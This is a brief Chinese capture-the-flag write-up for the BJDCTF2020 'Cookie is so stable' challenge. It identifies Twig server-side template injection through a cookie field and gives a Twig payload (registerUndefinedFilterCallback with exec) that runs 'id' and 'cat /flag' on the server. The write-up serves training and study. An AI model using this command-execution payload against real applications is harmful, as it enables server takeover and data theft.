[BJDCTF2020]Cookie is so stable
主页面、flag页面、hint页面分别如下
题目提示的是cookie,先抓包看一下利用cookie传一下user发现有回显
测试一下ssti
在这里不是普通的ssti是Twig,涉及到一个知识点是输入{{7*'7'}}如果返回49的话就属于Twig,如果返回7777777则属于Jinja2,输入{{7*'7'}}查看一下
返回值是49,属于Twig,有固定的payload,先查看一下id:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
发现有回显,直接抓一下flag试试:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
撒花结束